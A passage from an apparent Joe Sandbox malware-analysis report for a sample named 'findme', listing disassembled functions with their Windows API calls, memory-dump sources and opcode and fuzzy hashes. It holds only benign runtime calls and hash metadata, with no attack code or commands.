                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: cf5fc5a2d3957f1b11153db433ed4de9adfecf54f6fc0c2ad66d2467767b4b42
                    • Instruction ID: 398661a5644dbf4f690c836778117a34de9e790ca73704eca855a46641792737
                    • Opcode Fuzzy Hash: cf5fc5a2d3957f1b11153db433ed4de9adfecf54f6fc0c2ad66d2467767b4b42
                    • Instruction Fuzzy Hash: 9111C67BD00528A7CB51AA99CC85FEEB731AF48710F00411FFC04A7261CB398D1186A8
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                    • Instruction ID: 43b8a20c50ce8f8f1fce569f6e2017aaa34851fa27a256802f31446853d8db41
                    • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                    • Instruction Fuzzy Hash: 2FF081785007099FDBB0DA65C941B1677E4EB11328F20891FD496C6780E77AE8A4C75A
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C5BDC
                      • Part of subcall function 004CB07D: __EH_prolog.LIBCMT ref: 004CB082
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: a968ae61fda1e9ec9f872076337a68f069d0d6066d8fc54cb45f0f837f936da7
                    • Instruction ID: 95793bfa1f8e933aa37680aefd91cf0b007b37034b44fee83ba050376980c380
                    • Opcode Fuzzy Hash: a968ae61fda1e9ec9f872076337a68f069d0d6066d8fc54cb45f0f837f936da7
                    • Instruction Fuzzy Hash: E301A238900644DAC724F7A9C055BDDF7A49F19308F80809FA85A13283CBBC2B08C656
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: be7fa94c4bcffdfa1d9c7e855c9fa6a01b1989a18fe9825bed7b170eb3913f99
                    • Instruction ID: 080e5b9a993550990a39424725db33ba314661b80e882eb906feb7c9dc023978
                    • Opcode Fuzzy Hash: be7fa94c4bcffdfa1d9c7e855c9fa6a01b1989a18fe9825bed7b170eb3913f99
                    • Instruction Fuzzy Hash: 35E0A0619402E17AEF312B6B5C00B5B7B889B513B3F15022BAC5DA6291CE288C0187ED
                    APIs
                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 004CA4F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 8a7de5cc7ffab4c93712794a490df1124f94c4d3ad95ffa04707bd1fbad1b61c
                    • Instruction ID: 52b64916621a4448631461aec276646ed756c9b1c54b17e52cc0f96ed1324531
                    • Opcode Fuzzy Hash: 8a7de5cc7ffab4c93712794a490df1124f94c4d3ad95ffa04707bd1fbad1b61c
                    • Instruction Fuzzy Hash: 7DF0E939408384BACBA21B788804FD7BB91AF05339F04CA0FF1FD12192C67C14A5972B
                    APIs
                    • SetThreadExecutionState.KERNEL32(00000001), ref: 004D06B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ExecutionStateThread
                    • String ID:
                    • API String ID: 2211380416-0
                    • Opcode ID: 9e2193fea499e760f338acada6ba2ee1626ed0bbc956bc21883f79816c12aecb
                    • Instruction ID: 93de9fa712d58b4f32e33fa923e7cd478cff904706da00aaa2fc06ff32e6205e
                    • Opcode Fuzzy Hash: 9e2193fea499e760f338acada6ba2ee1626ed0bbc956bc21883f79816c12aecb
                    • Instruction Fuzzy Hash: 17D02B2420411039E621337AA859BFF1A060FC7719F09002FB90D133D78F4E0886E2EE
                    APIs
                    • GdipAlloc.GDIPLUS(00000010), ref: 004D9D81
                      • Part of subcall function 004D9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004D9B30
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Gdip$AllocBitmapCreateFromStream
                    • String ID:
                    • API String ID: 1915507550-0
                    • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                    • Instruction ID: ec9df2d498deb53398462a7e6a3dd53f044a74482a6fb7d2e9ab6dde84648400
                    • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                    • Instruction Fuzzy Hash: 82D0C73075420D7ADF41BAB69C2297A7BA9EB01350F10416FBC4CC6351EE76DE10A66A
                    APIs
                    • GetFileType.KERNELBASE(000000FF,004C9887), ref: 004C9995
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileType
                    • String ID:
                    • API String ID: 3081899298-0
                    • Opcode ID: 4c266ac6c39dc4d95de01c72ca6af9df5487e02e9c9e612bcc16d2a911d020ff
                    • Instruction ID: 37bebad12551e147e2bb3d0b8f6d01d3920667afd6d915997af2c6791bedfba7
                    • Opcode Fuzzy Hash: 4c266ac6c39dc4d95de01c72ca6af9df5487e02e9c9e612bcc16d2a911d020ff
                    • Instruction Fuzzy Hash: 6CD0C9B5011180B58FA14A34490DAAA7651DA83366B28C6FED025C42A5DB36CC03F546
                    APIs
                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 004DD43F
                      • Part of subcall function 004DAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004DAC85
                      • Part of subcall function 004DAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004DAC96
                      • Part of subcall function 004DAC74: IsDialogMessageW.USER32(00010434,?), ref: 004DACAA
                      • Part of subcall function 004DAC74: TranslateMessage.USER32(?), ref: 004DACB8
                      • Part of subcall function 004DAC74: DispatchMessageW.USER32(?), ref: 004DACC2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                    • String ID:
                    • API String ID: 897784432-0
                    • Opcode ID: 0d020d41250071bec11da666d6a348b8fc0ab9341f55fb89353602907846b085
                    • Instruction ID: 9ce025fb74a2b8126bb5e3001015663878ed8d3c09ccf14e5152fbdf0a858633
                    • Opcode Fuzzy Hash: 0d020d41250071bec11da666d6a348b8fc0ab9341f55fb89353602907846b085
                    • Instruction Fuzzy Hash: C0D09E35144300BBDA112B52CE07F1F7AA6AB99B08F004559B344740B286669D35EB16
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 21a9d7388030fe60fd60a5ffc829a71029be6aae92c8ecfdecc0db22215b0212
                    • Instruction ID: fe7830d33ffd9de74132cbc984e9cb2d390095b1f2ea3a78fd1edd38e5364181
                    • Opcode Fuzzy Hash: 21a9d7388030fe60fd60a5ffc829a71029be6aae92c8ecfdecc0db22215b0212
                    • Instruction Fuzzy Hash: A4B09295A680016C21096205A926E360258C882B14B30801FB109E12C0D448681A543A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 744f95a4f12dc1b233a10332da6abca4fbcb458ee1d244be7929baa57f1a9ff1
                    • Instruction ID: 204246aec8c21167e5162427cf4526837bb10f37f3aa264040387f26fefef908
                    • Opcode Fuzzy Hash: 744f95a4f12dc1b233a10332da6abca4fbcb458ee1d244be7929baa57f1a9ff1
                    • Instruction Fuzzy Hash: EBB012D5A6C1017C31497205FC26E36025CC8C3B14B30811FB109D13C0D4486C9A543F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 57542f1f855c9c3b1e1c2b47d2e1fe67514bbbacf666308f50230dbdbf7eee0c
                    • Instruction ID: e04ffbb75ec960e74a2456fd9f0c2618bbf96ee211bebfac8107bafc771434da
                    • Opcode Fuzzy Hash: 57542f1f855c9c3b1e1c2b47d2e1fe67514bbbacf666308f50230dbdbf7eee0c
                    • Instruction Fuzzy Hash: 71B012E5A6C0017C31097205FC26E36025CC8C3B14730801FB50DD12C0D4486C05943F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: e7f0b576b0948cdd55d57336a7d653b371e9ce7388cc707751dfb4b747582404
                    • Instruction ID: b8b81e0cd25fe623d8200b428903a7f594dfa512954c65f5980b670461aca4b7
                    • Opcode Fuzzy Hash: e7f0b576b0948cdd55d57336a7d653b371e9ce7388cc707751dfb4b747582404
                    • Instruction Fuzzy Hash: EBB012E5A6C1017C31497205FC26E36025CC8C3B14730411FB10DD12C0D4486C45943F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 593ce591ee064f993fa7afabae0c9bcbe373280405715da69aefe44675e1407f
                    • Instruction ID: 0a8616c967192327af907b82e2a0fba02088c0603b7dee56bf8bac479767b32d
                    • Opcode Fuzzy Hash: 593ce591ee064f993fa7afabae0c9bcbe373280405715da69aefe44675e1407f
                    • Instruction Fuzzy Hash: F0B012E5A6C0017C310D7206FC26E36025CD8C3B14730401FB10DD12C0D4486C05943F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 1fe172825b1f0c47a4732f0fc5027ec0be5fc945061fe3a710a8085fa8f63a82
                    • Instruction ID: f50b24f7e89f2f6f532e5951a5afc541e780f327139863d900feeedb7874ceed
                    • Opcode Fuzzy Hash: 1fe172825b1f0c47a4732f0fc5027ec0be5fc945061fe3a710a8085fa8f63a82
                    • Instruction Fuzzy Hash: 2AB012E5A6C0017C310D7205FD27E36025CC8C3B14730401FB10DD12C0D4486D06943F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 879e2bea2e17c1b5ba4fc11f2d493ae787e80637b34d8173e9e1a82c570f3dbc
                    • Instruction ID: c3349fdbb39ea6515264d5210dbbeb06f36280b95d850c6d42a58335d88bc8da
                    • Opcode Fuzzy Hash: 879e2bea2e17c1b5ba4fc11f2d493ae787e80637b34d8173e9e1a82c570f3dbc
                    • Instruction Fuzzy Hash: F4B012D9A6C3017C31093201FC76D3B021CC8C3B14730852FB109E01C0D4486C49983F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 6f3ca6893875681e587f810d3c82283d032b347624726093fd2a2337fc2d90a4
                    • Instruction ID: 021f2f55e6843240b1bf17e68a93a613e759c371b4e422a1cc9ff64246c3397e
                    • Opcode Fuzzy Hash: 6f3ca6893875681e587f810d3c82283d032b347624726093fd2a2337fc2d90a4
                    • Instruction Fuzzy Hash: 5AB012D9A6C1057C31097205FC66E3B025CE8C3B14730801FB109D12C0D4486C05553F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
                      • Part of subcall function 004DDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004DDFD6
                      • Part of subcall function 004DDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004DDFE7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c1ccebccd8e7c5fe1b67280c8db7696d1ddd1f82972cd555cf7b45237bec4d32
                    • Instruction ID: dfe55df55ce2381f5d03da86da33d1638f162dbe5b0fe6fdde96e2ffc099e06c
                    • Opcode Fuzzy Hash: c1ccebccd8e7c5fe1b67280c8db7696d1ddd1f82972cd555cf7b45237bec4d32
                    • Instruction Fuzzy Hash: D7B012D5A6C0017C31097205FC26E36025CC8C3B14B30C01FB509D13C0D4486C1A543F
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 004DD8A3
